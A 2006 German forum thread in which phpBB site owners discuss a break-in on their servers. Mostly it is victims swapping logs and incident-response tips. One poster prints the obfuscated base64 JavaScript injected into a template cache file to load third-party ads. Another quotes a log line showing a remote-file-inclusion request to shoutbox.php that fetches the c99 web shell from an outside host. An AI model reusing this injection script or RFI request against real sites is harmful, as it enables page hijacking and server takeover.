Hackerangriff mit Layer-Ads Werbung?

mgutt · Beitrag von **mgutt** » 13.10.2006 13:05

Hallo,

mir ist gerade was passiert was ich nicht wirklich verstehe.

Jemand hat auf meinem Server eine Datei modifiziert und eine Werbung eingebunden. Und zwar ist das eine spezielle Datei, die nur mit dem Categories Hierarchy Mod erstellt wird (Cachedatei von template-Dateien).

Nun ist diese Datei mein overall_footler.tpl. Die Cachedatei enthält die folgenden Zeilen: (zwei Leerzeilen hinzugefügt um Scrollen zu vermeiden)

Code: Alles auswählen

<script type="text/javascript">var versch =  'PHNjcmlwdCBzcmM9Imh0dHA6Ly9sYXllci1hZHMuZGUvbGEtNTY2Ni1zd WJpZDp0ZXN0LmpzIiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPjwvc2NyaXB0Pg %3D%3D';var base64s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; function decode(encStr) {  var bits; var decOut = ''; var i = 0; for(; i<encStr.length; i += 4) {  bits = (base64s.indexOf(encStr.charAt(i))    & 0xff) <<18 |         (base64s.indexOf(encStr.charAt(i +1)) & 0xff) <<12 |         (base64s.indexOf(encStr.charAt(i +2)) & 0xff) << 6 |          base64s.indexOf(encStr.charAt(i +3)) & 0xff;  decOut += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(encStr.charCodeAt(i -2) == 61) {  return(decOut.substring(0, decOut.length -2)); } else if(encStr.charCodeAt(i -1) == 61) {  return(decOut.substring(0, decOut.length -1)); } else {return(decOut)};} document.open(); document.write(decode(unescape(versch))); document.close();</script>

Wie bekomme ich den String encodiert? Ich habe an Hand der Werbung schon die Refid "5666" ausfindig gemacht. Die Firma Layer-Ads von denen die Werbung stammt ist telefonisch nicht zu erreichen.

Dann weiter nach der Suche der Refid habe ich diesen Link gefunden:
http://www.funpic.de/forum/webhosting/t ... s-wert-%3B).html

Wenn das Kommentar von MySnakeBite sich auf den 1. Post bezieht, dann gehört die ID, dem User cl0nk und der hatte mal ein funpic Projekt unter:
http://cl0nk.funpic.de/
die leitet weiter auf eine leer seite unter:
http://clonk.cwsurf.de/clan/portal.php
die subdomain selbst scheint gehackt zu sein:
http://clonk.cwsurf.de/

Zitat:

BaCk_T0_Sch00l ownz! by __HyOgA__ :*

Auch hier habe ich die ID gefunden:
http://forum.ebesucher.de/viewtopic.php ... b8cf208339

Ich studiere gerade die Logfiles durch. Wenn jemand was über die Refid herausfindet oder ähnliches bekannt ist würde ich mich freuen.

Gruß

mgutt · Beitrag von **mgutt** » 13.10.2006 13:24

Ok, ich konnte den Zugriff finden:
www.maxrev.de***83.***- - [13/Oct/2006:04:17:14 +0200] "GET /shoutbox.php?*** HTTP/1.1" 200 22169 "-" "Mozilla/6.35 Netscape/6.02 (Windows; I; Win3.11; es)"

und diesen:
www.maxrev.de***83*** - - [13/Oct/2006:04:17:58 +0200] "POST /shoutbox.php?*** HTTP/1.1" 200 23217 "-" "Mozilla/6.35 Netscape/6.02 (Windows; I; Win3.11; es)"

was machen? Anzeige erstatten? Was ist nun zu empfehlen. Die shoutbox.php ist ein Mod von phpBB.com. Diese sieht im Moment so aus:
www.maxrev.de/shoutbox.txt

Die Datei c99.txt scheint ja bekannt zu sein, wie ich im Netz herausfand:
http://ww.freewebs.com/sptkclan/c99.txt

Wir wohl des öfteren zum Hacken von Seiten genutzt.

Vielleicht ein Ansatz für Verbesserungen? Ich bin ja nicht sonderlich geschädigt worden bisher.

EDIT:
Sehe ich das richtig, dass die IP eine reele Deutsche ist?
http://serifos.eecs.harvard.edu/cgi-bin/whois.pl?q=83.***

EDIT2:
Wie ich so sehe bin ich gar nicht mal wenig (nur heute) unter Beschuss:
www.maxrev.de***219.*** - - [13/Oct/2006:04:04:36 +0200] "GET /shoutbox.php?*** HTTP/1.1" 200 115559 "-" "Mozilla/6.35 Netscape/6.02 (Windows; I; Win3.11; es)"
www.maxrev.de***219***- - [13/Oct/2006:04:05:12 +0200] "GET /shoutbox.php?*** HTTP/1.1" 200 115559 "-" "Mozilla/6.35 Netscape/6.02 (Windows; I; Win3.11; es)"
www.maxrev.de***82.***- - [13/Oct/2006:05:10:30 +0200] "GET /admin/admin_topic_action_logging.php?*** HTTP/1.1" 401 471 "-" "libwww-perl/5.76"
www.maxrev.de***81.**** - - [13/Oct/2006:11:09:30 +0200] "GET /admin/admin_topic_action_logging.php?*** HTTP/1.1" 401 471 "-" "libwww-perl/5.79"
www.maxrev.de******* - - [13/Oct/2006:12:37:58 +0200] "GET /admin/admin_topic_action_logging.php?*** HTTP/1.1" 401 471 "-" "libwww-perl/5.79"
weitere entfernt und sonstige zensiert um Nachahmungen zu vermeiden...

Ich hoffe da war jetzt keiner doppelt

scheibenbrot · Beitrag von **scheibenbrot** » 13.10.2006 13:58

Übrigens scheint die seite Layerads.de nicht ganz ok zu sein.
Bei mir wird sie als "Pay to Surf-Site" identifiziert.

mgutt · Beitrag von **mgutt** » 13.10.2006 14:12

Ich habe soweit alle Logs von heute veröffentlicht. Wurde noch etwas anderes bei mir verändert? Insbesondere, wenn ich die htdocs Zeilen lese wird mir schon mulmig.

CatZe · Beitrag von **CatZe** » 13.10.2006 14:19

hi mgutt,

hmm .. sieht wirklich nicht gut aus ..

Frage, hast Du nen dedizierten Server, oder ist das Webspace?

Edit: die IPs kommen von ueberall aus der Welt, koennten Open Proxies sein oder aufgemachte Kisten. was Du machen koenntest, waere den Hoster von den deutschen IP's anmailen (abuse) ... Anzeige lohnt sich nur dann, wenn Du deswegen einen materiellen Schaden hast, den Du an den Owner der angreifenden Kiste weiterleiten willst. ....

mgutt · Beitrag von **mgutt** » 13.10.2006 14:44

Ich habe nen Server.

Schaden habe ich seit dem mir das ganze aufgefallen ist: Meine Arbeitszeit plus die Sache, dass Werbung eingeblendet wurde, deren Einnahmen nicht an mich gehen.

Gruß

CatZe · Beitrag von **CatZe** » 13.10.2006 14:49

hast Du mal nen chkrootkit drueber gejagt?

und Arbeit macht ein Server immer

, ergo ist der Schaden schwer b emessbar, und es kommt aufs Verhaeltnis an .. aber bei Verhaelltnismaessigkeit kann Dir nur nen Rechtsanwalt helfen (denke aber eher, dass es sich nicht lohnt)

dslmonster · Beitrag von **dslmonster** » 13.10.2006 15:05

hi mgutt,

habe bei mir auch was gehabt, was aber vom Cback CT geblockt worden ist

shoutbox.php?phpbb_root_path=http://www.freewebs.com/sptkclan/c99.txt? ....

nur bei mir erscheint kein LayerAd oder so.

dabei habe ich nur webspace und keinen Server,
werde mir gleich auch mal die Log anschauen

gruß
dslmonster

EDIT:
das der passende eintrag aus der Log Datei:
66.199.184.254 - - [13/Oct/2006:05:16:33 +0200] "GET /shoutbox.php?phpbb_root_path=http://www.freewebs.com/sptkclan/c99.txt? HTTP/1.1" 200 1669 "-" "Mozilla/6.35 Netscape/6.02 (Windows; I; Win3.11; es)"

CatZe · Beitrag von **CatZe** » 13.10.2006 15:11

hoi mgutt,

schau mal bitte nach, ob dein Serverchen eine Verbindung nach irc.dalnet.ru/6667 offen hat .. wenn ja, wirste um eine Neuinstallation nicht herum kommen, dann ist der offen

mgutt · Beitrag von **mgutt** » 13.10.2006 15:43

CatZe hat geschrieben:hoi mgutt,

schau mal bitte nach, ob dein Serverchen eine Verbindung nach irc.dalnet.ru/6667 offen hat .. wenn ja, wirste um eine Neuinstallation nicht herum kommen, dann ist der offen

wie mache ich das?